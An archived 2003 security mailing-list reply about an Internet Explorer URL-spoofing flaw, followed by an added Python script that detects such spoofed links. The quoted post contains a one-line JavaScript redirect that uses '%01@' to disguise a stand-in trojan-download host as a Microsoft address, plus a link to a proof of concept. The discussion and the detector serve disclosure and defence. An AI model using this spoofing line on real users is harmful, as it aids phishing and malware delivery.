Message-ID: <C586E9AFE24DD511BE9900306E007B0803B6D3CA@sgmcbem1.starhub.com.sg>
From: jho at starhub.com (Julian HO Thean Swee)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability
Hmm, it doesn't seem to work on my browser :)
I don't even get transported to any page when I click the button.
But then again, I have everything turned off in the internet zone by
default...
(but my submit non-encrypted form data is on)
Does it really work then? It looks like it's using javascript...?
(location.href)
Merry Christmas everyone :)
> Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST)
> From: S G Masood <sgmasood@...oo.com>
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
>
>
> LOL. This is so simple and dangerous, it almost made
> me laugh and cry at the same time. Most of you will
> realise why...;D
> The Paypal, AOL, Visa, Mastercard, et al email
> scammers will have a harvest of gold this month with
> lots of zombies falling for this simple technique.
>
> ># POC ##########
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
>
> Don't be surprised if your latest download from
> http://www.microsoft.com turns out to be a trojan!
>
> location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadaneviltrojanfromme.com');
>
>
> --
> S.G.Masood
>
> Hyderabad,
> India
>
> PS: One more thing - no scripting required to exploit this.
>
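A defender-side check for the authority-parsing trick the quoted post describes. This is an added example, not code from the thread or from either poster: it parses the URL the way a conforming client does (everything after the last "@" in the authority is the host), decodes the userinfo as unescape() would, and flags userinfo that carries control characters or is shaped like a hostname. The sample URLs and the "evil.example" host are constructed placeholders.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample URLs (not taken from the thread). "evil.example" is a
# placeholder standing in for an attacker-controlled site.
SAMPLE_URLS = {
    "plain": "http://www.example.com/download/file.exe",
    "spoof_encoded": "http://windowsupdate.microsoft.com%01@evil.example/trojan.exe",
    "spoof_raw": "http://windowsupdate.microsoft.com\x01@evil.example/trojan.exe",
    "ftp_userinfo": "ftp://user:pass@files.example.org/pub/",
}

_ABSOLUTE_URL = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*)://([^/?#]*)(.*)$", re.S)
_C0_OR_DEL = re.compile(r"[\x00-\x1f\x7f]")


def split_authority(url: str) -> Optional[tuple]:
    """Split an absolute URL into (scheme, authority, rest) per RFC 3986 §3.
    The authority runs from '://' to the first '/', '?' or '#'."""
    m = _ABSOLUTE_URL.match(url)
    return m.groups() if m else None


def effective_host(url: str) -> Optional[str]:
    """Host a conforming client connects to: the part of the authority after
    the LAST '@' (userinfo precedes it), with any :port removed."""
    parts = split_authority(url)
    if parts is None:
        return None
    hostport = parts[1].rpartition("@")[2]
    if hostport.startswith("["):            # IPv6 literal, e.g. [::1]:8080
        return hostport.split("]", 1)[0].lower() + "]"
    return hostport.rsplit(":", 1)[0].lower() if ":" in hostport else hostport.lower()


def assess(url: str) -> dict:
    """Defender-side triage of one URL (from proxy logs, an inbound mail, etc.):
    report the real host and flag userinfo crafted to read as another site."""
    parts = split_authority(url)
    if parts is None:
        return {"host": None, "userinfo": None, "findings": ["not an absolute URL"]}
    userinfo, at, _ = parts[1].rpartition("@")
    findings = []
    if at:
        findings.append("userinfo present")
        decoded = unquote(userinfo)          # %01 -> \x01, as unescape() would
        if _C0_OR_DEL.search(decoded):
            findings.append("control character in userinfo")
        if "." in decoded.split(":", 1)[0]:  # user part shaped like a hostname
            findings.append("userinfo looks like a hostname")
    return {"host": effective_host(url), "userinfo": userinfo if at else None,
            "findings": findings}


if __name__ == "__main__":
    for name, u in SAMPLE_URLS.items():
        print(name, assess(u))
```

The point of the check is that the displayed prefix ("windowsupdate.microsoft.com") is userinfo, not the host; a mail gateway or proxy that logs effective_host() rather than the raw string sees the real destination, and the two findings give a cheap rule for quarantining links that abuse this.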